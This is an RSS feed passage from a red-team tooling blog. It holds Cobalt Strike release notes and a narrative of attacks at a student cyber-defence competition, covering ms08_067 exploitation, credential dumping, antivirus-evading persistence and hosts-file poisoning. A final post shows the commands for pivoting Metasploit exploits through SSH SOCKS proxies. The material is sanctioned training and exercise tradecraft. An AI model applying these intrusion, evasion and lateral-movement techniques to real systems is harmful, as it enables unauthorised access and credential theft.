		<comments>http://blog.strategiccyber.com/2013/04/10/cobalt-strike-updates-04-10-13/#comments</comments>
		<pubDate>Wed, 10 Apr 2013 10:55:35 +0000</pubDate>
		<dc:creator>rsmudge</dc:creator>
				<category><![CDATA[Cobalt Strike]]></category>

		<guid isPermaLink="false">http://blog.strategiccyber.com/?p=1932</guid>
<description><![CDATA[March and April are the busy season for me. I&#8217;m on the road traveling to various exercises, testing out my wares. Starting this weekend, I will play red in three exercises back-to-back. One advantage to playing in all of these exercises is that I&#8217;m able to leverage my experiences and feedback from my fellow red [&#8230;]]]></description>
				<content:encoded><![CDATA[<p>March and April are the busy season for me. I&#8217;m on the road traveling to various exercises, testing out my wares. Starting this weekend, I will play red in three exercises back-to-back. One advantage to playing in all of these exercises is that I&#8217;m able to leverage my experiences and feedback from my fellow red team members to improve Armitage and Cobalt Strike.</p>
<p>Here are a few of the exercise-inspired changes that made it into this release:</p>
<ul>
<li>The VNC Viewer in Cobalt Strike now starts out view only. Untoggle the spy button to take control of the user&#8217;s desktop. &#8212; I&#8217;m having a lot of fun with VNC at these various exercises, but unfortunately I keep giving myself away by accidentally moving a student&#8217;s mouse. This change will ensure that I&#8217;m only moving a cursor when I want to.</li>
<li>Added a <strong>spawnto</strong> command to Beacon. This command forces Beacon to use the specified program to spawn shellcode into. &#8212; Pro-tip for RAT Developers: if you inject shellcode into the current process, you risk losing your access if the shellcode crashes the process. To get around this, Beacon spawns shellcode into a notepad.exe instance. I use notepad.exe because its location is reliable. Unfortunately, the world is getting wise to dirty hacker tricks, such as connecting to the internet from notepad.exe. With this change, you can have Beacon spawn shellcode into something else on the user&#8217;s system (e.g., Internet Explorer).</li>
<li>The event log now shows the date next to the time associated with each message. Cobalt Strike also highlights messages that mention your nickname.</li>
<li>After <a href="http://blog.strategiccyber.com/2013/04/01/wrccdc-a-red-team-members-perspective/">Western Regional CCDC</a>, I tried to generate a report from the four team servers I was connected to. The merged report wasn&#8217;t up to my standards. Most fields weren&#8217;t sorted, credentials weren&#8217;t merged across servers, and several other details were out of whack. Instead of one report, I generated four (one from each server) and used the reports to give students feedback. For this update, I went through the various data merging issues and corrected them. Next event, it&#8217;s my hope to generate one report that tells the full story.</li>
</ul>
<p>I&#8217;ve also added <a href="http://www.advancedpentest.com/help-install-kali-linux">installation instructions for Kali Linux</a>. The full list of changes is in the <a href="http://www.advancedpentest.com/releasenotes.txt">Cobalt Strike Release Notes</a> file. Licensed users may <a href="http://www.advancedpentest.com/help-update-cobalt-strike">run the update</a> program to get the latest. A <a href="http://www.advancedpentest.com/trial">21-day trial</a> of Cobalt Strike is also available.</p>
<br />Filed under: <a href='http://blog.strategiccyber.com/category/cobalt-strike-2/'>Cobalt Strike</a>]]></content:encoded>
			<wfw:commentRss>http://blog.strategiccyber.com/2013/04/10/cobalt-strike-updates-04-10-13/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/44a44db75f21982b563b1febf38b27ad?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rsmudge</media:title>
		</media:content>
	</item>
		<item>
		<title>WRCCDC &#8211; A Red Team Member&#8217;s Perspective</title>
		<link>http://blog.strategiccyber.com/2013/04/01/wrccdc-a-red-team-members-perspective/</link>
		<comments>http://blog.strategiccyber.com/2013/04/01/wrccdc-a-red-team-members-perspective/#comments</comments>
		<pubDate>Mon, 01 Apr 2013 20:43:55 +0000</pubDate>
		<dc:creator>rsmudge</dc:creator>
				<category><![CDATA[Red Team]]></category>

		<guid isPermaLink="false">http://blog.strategiccyber.com/?p=1849</guid>
<description><![CDATA[Western Regional CCDC was pretty epic. Given the level of interest in red activity, I&#8217;d like to share what I can. So much happened, I couldn&#8217;t keep up with all of it. That said, here&#8217;s my attempt to document some of the red team fun from my perspective at Western Regional CCDC. * . . [&#8230;]]]></description>
				<content:encoded><![CDATA[<p><a href="http://wrccdc.org/">Western Regional CCDC</a> was pretty epic. Given the level of interest in red activity, I&#8217;d like to share what I can. So much happened, I couldn&#8217;t keep up with all of it. That said, here&#8217;s my attempt to document some of the red team fun from my perspective at Western Regional CCDC.</p>
<pre>* . . . . o o o o o
*               _____      o       _______
*      ____====  ]OO|_n_n__][.     |lamer|
*     [________]_|__|________)&lt;    |ville|
*      oo    oo  'oo OOOO-| oo\\_   ~~~|~~~
*  +--+--+--+--+--+--+--+--+--+--+--+--+--+</pre>
<p>The scenario was interesting. Students were put in charge of a Computer Crime Defense Center. Part of their job involved protecting a repository of computer viruses.</p>
<p>Blue teams were given a 2-hour head start to secure their systems and change passwords. I was a little worried about this, but this worry was unfounded. The WRCCDC Black Team is far more evil than any red team I have ever seen. Students had to cope with a very strange network which included things like <strong>kill</strong> yelling at them for not saying the magic word, gratuitous appearances of <a href="http://www.robobunny.com/projects/asciiquarium/html/">ASCIIQuarium</a>, and systems named in very confusing ways. Imagine my surprise when a UNIX box I quickly backdoored called home as winxp. Yeah&#8230;</p>
<div class="wp-caption alignnone" style="width: 610px"><img alt="" src="https://a248.e.akamai.net/camo.github.com/8531a3cbe60a0c754c76da199f627b3424a1feb2/687474703a2f2f692e696d6775722e636f6d2f784f4a62452e706e67" width="600" height="461" /><p class="wp-caption-text">Everyone loves pwnies</p></div>
<blockquote class='twitter-tweet' lang='en'><p><a href="https://a248.e.akamai.net/camo.github.com/8531a3cbe60a0c754c76da199f627b3424a1feb2/687474703a2f2f692e696d6775722e636f6d2f784f4a62452e706e67"> a248.e.akamai.net/camo.github.co…</a> <a href="https://github.com/erkin/ponysay"> github.com/erkin/ponysay</a> <a href="http://twitter.com/search?q=%23wrccdc" title="#wrccdc">#wrccdc</a> More black team fun...</p>&mdash; <br />James Schneider (@disturbedmime) <a href='http://twitter.com/#!/disturbedmime/status/317910911820120064' data-datetime='2013-03-30T08:07:22+00:00'>March 30, 2013</a></blockquote>
<h3>The Low Hanging Fruit</h3>
<p>Once the waiting period was over, we sat down at our systems and prepared to &#8220;facilitate&#8221; a learning experience. The first hint that we started was Vyrus&#8217;s music blasting through the convention center.</p>
<blockquote class='twitter-tweet' lang='en'><p>They say Apple is evil. <a href="http://twitter.com/search?q=%23macbook" title="#macbook">#macbook</a> <a href="http://twitter.com/search?q=%23wrccdc" title="#wrccdc">#wrccdc</a> <a href="http://twitter.com/search?q=%23redteam" title="#redteam">#redteam</a> <a href="http://t.co/wm2jwXq2Th" rel="nofollow">http://t.co/wm2jwXq2Th</a></p>&mdash; <br />WRCCDC (@wrccdc) <a href='http://twitter.com/#!/wrccdc/status/317770403126861824' data-datetime='2013-03-29T22:49:02+00:00'>March 29, 2013</a></blockquote>
<p>It took us a few minutes to get going. Apparently ICMP was not passing through from our space to the teams. So we had to resort to finding systems by looking for open services. I started with a quick sweep for port 22 and 445 with the Metasploit Framework&#8217;s ssh_version and smb_version modules. I focused on one team space at a time, to allow myself to learn the layout of the competition environment without waiting forever.</p>
<p>It didn&#8217;t take long to discover a few Windows 2003 systems. Even after a 2-hour delay, these were pretty easy to sweep with ms08_067_netapi. Stopping access to port 445 with a host-based firewall would have easily defeated this.</p>
<p>Once I had access to a few Windows systems, <a href="http://www.ampliasecurity.com/research/wcefaq.html">Windows Credential Editor</a> helped me get ahold of the default password: Opensolaris1. A few of us discovered and pasted this credential to IRC at about the same time.</p>
<div id="attachment_1902" class="wp-caption aligncenter" style="width: 460px"><a href="http://rsmudge.files.wordpress.com/2013/04/passwords.png"><img class="size-large wp-image-1902" alt="Output of a Cortana script that runs Windows Credential Editor." src="http://rsmudge.files.wordpress.com/2013/04/passwords.png?w=450&#038;h=154" width="450" height="154" /></a><p class="wp-caption-text">Output of a <a href="https://github.com/rsmudge/cortana-scripts/tree/master/wce">Cortana script</a> that runs Windows Credential Editor.</p></div>
<p>I had a <a href="http://www.advancedpentest.com/help-scripting-cortana">Cortana script</a> ready to persist like crazy on the Windows systems. I&#8217;m not giving away my full kit for this year, yet&#8230; but it&#8217;s spiritually similar to <a href="http://blog.strategiccyber.com/2012/10/04/dirty-red-team-tricks-ii-at-derbycon-2-0/">last year&#8217;s kit</a>. I also made a special effort to drop files to disk that anti-virus does not catch at this time.</p>
<p>I was able to verify that persistence worked by viewing the Beacons on the three Cobalt Strike team servers I had up. <a href="http://www.advancedpentest.com/help-beacon">Cobalt Strike&#8217;s Beacon</a> is an asynchronous post-exploitation agent. It doesn&#8217;t maintain a persistent connection to me; rather, it periodically calls home to request the tasks that it should run.</p>
<p>Once I had default credentials, my next step was to attempt to log in to all UNIX systems over SSH and to sweep all other Windows systems (with port 445 open) with psexec.</p>
<div id="attachment_1927" class="wp-caption aligncenter" style="width: 460px"><a href="http://rsmudge.files.wordpress.com/2013/04/maus2.png"><img class="size-large wp-image-1927" alt="Maus owned a healthy number of UNIX machines too. *pHEAR*" src="http://rsmudge.files.wordpress.com/2013/04/maus2.png?w=450&#038;h=281" width="450" height="281" /></a><p class="wp-caption-text">Maus owned a healthy number of UNIX machines too. *pHEAR*</p></div>
<p>Even 2 hours in, the default credentials bore a lot of fruit. They allowed us to lay down some persistence on the UNIX systems and to capture a Windows 2012 server system from one team.</p>
<h3>Taking Points</h3>
<p>The red team is able to affect blue team scores in three ways. Gaining access to a host takes away points. Stealing certain data flags takes away points. We&#8217;re also able to disrupt services or deface websites, which takes away points because the teams will fail service checks.</p>
<blockquote class='twitter-tweet' lang='en'><p>Ahh Rick Astley, you&#039;re never gonna give me up. <a href="http://twitter.com/search?q=%23wrccdc" title="#wrccdc">#wrccdc</a> <a href="http://t.co/YYb7NalviO" rel="nofollow">http://t.co/YYb7NalviO</a></p>&mdash; <br />uos&#1503;&#7450;&#592;&#596; &#1503;&#477;&#592;&#613;&#596;&#305;&#623; (@blainecarlson) <a href='http://twitter.com/#!/blainecarlson/status/317892865571295232' data-datetime='2013-03-30T06:55:40+00:00'>March 30, 2013</a></blockquote>
<h3>Managing Persistence</h3>
<p>I spent most of my time during the competition <a href="http://blog.strategiccyber.com/2013/02/12/a-vision-for-distributed-red-team-operations/">managing Beacons across multiple servers</a>. I would task Beacons to spawn sessions to one of the team servers my red team compatriots were connected to. The idea is this: if a blue team member sees notepad.exe connecting to an IP address, they may squash that connection and block that IP address, but so long as they don&#8217;t discover the Beacons, they can&#8217;t keep us out.</p>
<div id="attachment_1900" class="wp-caption aligncenter" style="width: 460px"><a href="http://rsmudge.files.wordpress.com/2013/04/09-21-21-beacon_10_10_12_12_3448.png"><img class="size-large wp-image-1900" alt="netstat -nab is a tool to help you discover rogue notepad.exe instances connecting to the internet" src="http://rsmudge.files.wordpress.com/2013/04/09-21-21-beacon_10_10_12_12_3448.png?w=450&#038;h=186" width="450" height="186" /></a><p class="wp-caption-text">netstat -nab is a tool to help you discover rogue notepad.exe instances connecting to the internet</p></div>
<p>Sometimes, we&#8217;d get access to a Windows system that we did not have before. This may be because the team&#8217;s system or network was down during our earlier exploiting frenzy. When this happened, I&#8217;d help whoever gained access to the system pass it to me, so I could install persistence on it. This system would now be available for anyone connected to the team server to abuse or pivot through.</p>
<p>Sometimes, I&#8217;d fight to protect our persistence:</p>
<span class='embed-youtube' style='text-align:center; display: block;'><iframe class='youtube-player' type='text/html' width='450' height='284' src='http://www.youtube.com/embed/6jCJCXdZHh4?version=3&#038;rel=1&#038;fs=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent' frameborder='0'></iframe></span>
<p>Later in the event, the two lead teams had creative egress filtering and routing in place. I spent my time trying to understand, through trial and error, what they would and wouldn&#8217;t allow. Eventually, I ended up having to task Beacon to send reverse https sessions to a team server located in Amazon&#8217;s EC2. This gave the folks interested in dealing with these teams the opportunity to do so.</p>
<h3>Special Attention</h3>
<p>Friday, before dinner, I opted to give each team special attention. My goal was to loop through each team, one at a time, understand their networks, understand what changed, and find the low hanging fruit I could grab and persist on again. I didn&#8217;t want to miss easy access opportunities from being too busy.</p>
<p>I started with team 13 and tasked any beacons I had calling home to give me a session. Once I had my sessions, I ran Windows Credential Editor again to get any plaintext passwords. I also dumped password hashes and gave them a quick pass through John the Ripper.</p>
<p>I then set up a pivot through a Windows system, discovered live hosts with an ARP scan, and used several <a href="http://www.metasploit.com">Metasploit Framework</a> modules to discover the open services.</p>
<p>If I didn&#8217;t have access to a Windows host for a team, I would try to work from a Linux system. Conveniently, the competition black team had a Raspberry Pi device installed on each team&#8217;s network. It was taped under a table and connected directly to their switch. These devices had default credentials and <a href="http://nmap.org/">NMap</a>. In several cases, I was able to use the Raspberry Pi to run NMap against a team and import the results into Cobalt Strike.</p>
<p>In the few cases that we didn&#8217;t have access to any systems (one team adopted a strategy of staying down the entire event!), I would run NMap from a non-team server system and import the results into Cobalt Strike.</p>
<p>Once I understood which services the team had open, I would then attempt all known credentials against their Windows and UNIX hosts. If a Windows 2003 system was not hooked, I would use the trusty ms08_067_netapi exploit again. I should state that ms08_067_netapi is the only memory corruption exploit I used during this event.</p>
<div id="attachment_1898" class="wp-caption aligncenter" style="width: 460px"><a href="http://rsmudge.files.wordpress.com/2013/04/cogajkzb.jpeg"><img class="size-large wp-image-1898" alt="Ok, I'm not going to be re-exploiting this box anytime soon. Oh well :)" src="http://rsmudge.files.wordpress.com/2013/04/cogajkzb.jpeg?w=450&#038;h=337" width="450" height="337" /></a><p class="wp-caption-text">Ok, I&#8217;m not going to be re-exploiting this box anytime soon. Oh well <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /></p></div>
<p>During this step of the game, I got lucky as several blue teams opted to use the same password on different systems. This reused password allowed me to get access to and persist on their Windows 2012 systems.</p>
<p>Checking a few choice file locations yielded access to other assets as well:</p>
<span class='embed-youtube' style='text-align:center; display: block;'><iframe class='youtube-player' type='text/html' width='450' height='284' src='http://www.youtube.com/embed/EaH87NPM4R0?version=3&#038;rel=1&#038;fs=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent' frameborder='0'></iframe></span>
<h3>Shenanigans</h3>
<p>The Western Regional CCDC Red Team had some crazy scary talent. Alex Levinson spent a lot of time administering forums for the blue teams. Alex, Vyrus, and <a href="https://twitter.com/maus_">Maus</a> also built a system to track our accesses, credentials, and report our activity to the competition judges. This was a big help and we were able to pilot some ways to have the Metasploit Framework feed data to this system, automagically.</p>
<blockquote class='twitter-tweet' lang='en'><p>Our <a href="http://twitter.com/search?q=%23wrccdc" title="#wrccdc">#wrccdc</a> red team including @<a href="https://twitter.com/armitagehacker">armitagehacker</a> @<a href="https://twitter.com/theKos">theKos</a> @<a href="https://twitter.com/michaelmcg19">michaelmcg19</a> @<a href="https://twitter.com/jrozner">jrozner</a> @<a href="https://twitter.com/vyrus001">vyrus001</a> @<a href="https://twitter.com/alexlevinson">alexlevinson</a> <a href="http://t.co/fU8OUIJwMu" rel="nofollow">http://t.co/fU8OUIJwMu</a></p>&mdash; <br />WRCCDC (@wrccdc) <a href='http://twitter.com/#!/wrccdc/status/318237940054638592' data-datetime='2013-03-31T05:46:52+00:00'>March 31, 2013</a></blockquote>
<p>Kos took over the X desktop for two teams and gave them full screen VNC access to each other.</p>
<blockquote class='twitter-tweet' lang='en'><p>Team 3, say hello to the full screen VNC session of Team 5s desktop. nowkiss.jpg <a href="http://twitter.com/search?q=%23wrccdc" title="#wrccdc">#wrccdc</a></p>&mdash; <br />Kos (@theKos) <a href='http://twitter.com/#!/theKos/status/317842914178920448' data-datetime='2013-03-30T03:37:10+00:00'>March 30, 2013</a></blockquote>
<p>I also heard of minecraft servers getting set up on blue team systems, an important way to provide the red team with a break.</p>
<blockquote class='twitter-tweet' lang='en'><p>Is that another minecraft servers I see running on <a href="http://twitter.com/search?q=%23blueteam" title="#blueteam">#blueteam</a> servers at <a href="http://twitter.com/search?q=%23wrccdc" title="#wrccdc">#wrccdc</a>? <a href="http://t.co/F2CINfnrJX" rel="nofollow">http://t.co/F2CINfnrJX</a></p>&mdash; <br />uos&#1503;&#7450;&#592;&#596; &#1503;&#477;&#592;&#613;&#596;&#305;&#623; (@blainecarlson) <a href='http://twitter.com/#!/blainecarlson/status/317837685345624065' data-datetime='2013-03-30T03:16:24+00:00'>March 30, 2013</a></blockquote>
<p>I spent some time poisoning hosts entries on student systems to prevent them from getting to their inject scoring engine site, google, and others.</p>
<span class='embed-youtube' style='text-align:center; display: block;'><iframe class='youtube-player' type='text/html' width='450' height='284' src='http://www.youtube.com/embed/zSFR4-iBrgM?version=3&#038;rel=1&#038;fs=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent' frameborder='0'></iframe></span>
<p>A lot of pretty funny pranks came from the red team. I wish I was able to keep up with all of it and detail it to you here. Despite this shortcoming, I hope this perspective helped shed some light on the red team activity that took place over the weekend.</p>
<blockquote class='twitter-tweet' lang='en'><p><a href="http://twitter.com/search?q=%23wrccdc" title="#wrccdc">#wrccdc</a> top three teams, thanks for another great year <a href="http://t.co/QEvOHFzWT4" rel="nofollow">http://t.co/QEvOHFzWT4</a></p>&mdash; <br />Patrick O&#039;Connor (@patrickoconnor) <a href='http://twitter.com/#!/patrickoconnor/status/318273718071726080' data-datetime='2013-03-31T08:09:02+00:00'>March 31, 2013</a></blockquote>
<blockquote class='twitter-tweet' lang='en'><p>Congratulations to our 2013 <a href="http://twitter.com/search?q=%23WRCCDC" title="#WRCCDC">#WRCCDC</a> Winners! 3rd: CSU: San Bernardino, 2nd: UC Berkeley, and 1st: Cal-Poly Pomona <a href="http://fb.me/xeptxEkg"> fb.me/xeptxEkg</a></p>&mdash; <br />WRCCDC (@wrccdc) <a href='http://twitter.com/#!/wrccdc/status/318563320749752320' data-datetime='2013-04-01T03:19:48+00:00'>April 01, 2013</a></blockquote>
<p><em>One last note to close with, like any effective team, we specialize. Our red team had an infrastructure specialist, folks going after web applications, some going after access via other means, and still others handling post-exploitation on Windows and UNIX. There really was a lot happening.</em></p>
<br />Filed under: <a href='http://blog.strategiccyber.com/category/red-team-2/'>Red Team</a>]]></content:encoded>
			<wfw:commentRss>http://blog.strategiccyber.com/2013/04/01/wrccdc-a-red-team-members-perspective/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/44a44db75f21982b563b1febf38b27ad?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rsmudge</media:title>
		</media:content>

		<media:content url="https://a248.e.akamai.net/camo.github.com/8531a3cbe60a0c754c76da199f627b3424a1feb2/687474703a2f2f692e696d6775722e636f6d2f784f4a62452e706e67" medium="image" />

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/passwords.png?w=450" medium="image">
			<media:title type="html">Output of a Cortana script that runs Windows Credential Editor.</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/maus2.png?w=450" medium="image">
			<media:title type="html">Maus owned a healthy number of UNIX machines too. *pHEAR*</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/09-21-21-beacon_10_10_12_12_3448.png?w=450" medium="image">
			<media:title type="html">netstat -nab is a tool to help you discover rogue notepad.exe instances connecting to the internet</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/cogajkzb.jpeg?w=450" medium="image">
			<media:title type="html">Ok, I&#039;m not going to be re-exploiting this box anytime soon. Oh well :)</media:title>
		</media:content>
	</item>
		<item>
		<title>Pivoting through SSH</title>
		<link>http://blog.strategiccyber.com/2013/03/28/pivoting-through-ssh/</link>
		<comments>http://blog.strategiccyber.com/2013/03/28/pivoting-through-ssh/#comments</comments>
		<pubDate>Thu, 28 Mar 2013 22:32:32 +0000</pubDate>
		<dc:creator>rsmudge</dc:creator>
				<category><![CDATA[metasploit framework]]></category>

		<guid isPermaLink="false">http://blog.strategiccyber.com/?p=1756</guid>
<description><![CDATA[This is a pretty quick tip, but still useful. When you SSH to a host, you may use the -D flag to setup &#8220;dynamic&#8221; application-level port forwarding. Basically, this flag makes your ssh client setup a SOCKS server on the port you specify: What you may not know, is that it&#8217;s possible to send your [&#8230;]]]></description>
<content:encoded><![CDATA[<p>This is a pretty quick tip, but still useful. When you SSH to a host, you may use the -D flag to set up &#8220;dynamic&#8221; application-level port forwarding. Basically, this flag makes your ssh client set up a SOCKS server on the port you specify:</p>
<pre class="brush: plain; title: ; notranslate">ssh -D 1234 msfadmin@whatever.host</pre>
<p>What you may not know is that it&#8217;s possible to send your Metasploit Framework exploits through this SSH session. To do so, just set the <strong>Proxies</strong> option. It&#8217;s an Advanced option, so you will need to check the <em>Show Advanced Options</em> box in Armitage. The syntax is:</p>
<pre class="brush: plain; title: ; notranslate">socks4:[host]:[port]</pre>
<p>To send an attack through this SSH session, I would set <strong>Proxies</strong> to socks4:127.0.0.1:1234.</p>
<p>This came in handy at the North East Collegiate Cyber Defense Competition. We were able to get onto a student network through one Linux host. This Linux host could see another Linux host on the same network. Through this second Linux host, we were able to touch the team&#8217;s domain controller. We had cracked several credentials earlier. Our last task was to verify whether any of them worked on the domain controller. We fixed the team&#8217;s DNS server and installed smbclient. Once we discovered one of our accounts could read the ADMIN$ share, we used ssh -D 8080 to get to the first server. We set up proxychains to go through this SOCKS host. We then used ssh -D 8081 to connect to the second server. From that point, we were able to point Proxies to socks4:127.0.0.1:8081 to psexec an executable to the domain controller. This executable delivered <a href="http://www.advancedpentest.com/help-beacon">Cobalt Strike&#8217;s Beacon</a>, which gave us some post-exploitation capabilities. We held that domain controller for the rest of the event.</p>
<p style="text-align:center;"><a href="http://rsmudge.files.wordpress.com/2013/03/t3.png"><img class="aligncenter  wp-image-1847" alt="t3" src="http://rsmudge.files.wordpress.com/2013/03/t3.png?w=585&#038;h=195" width="585" height="195" /></a></p>
<p>If you ever need to pivot an attack through an SSH session, the <strong>Proxies</strong> option will come in handy.</p>
<br />Filed under: <a href='http://blog.strategiccyber.com/category/metasploit-framework/'>metasploit framework</a>]]></content:encoded>
			<wfw:commentRss>http://blog.strategiccyber.com/2013/03/28/pivoting-through-ssh/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/44a44db75f21982b563b1febf38b27ad?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rsmudge</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/03/t3.png" medium="image">
			<media:title type="html">t3</media:title>
		</media:content>
	</item>
	</channel>
</rss>
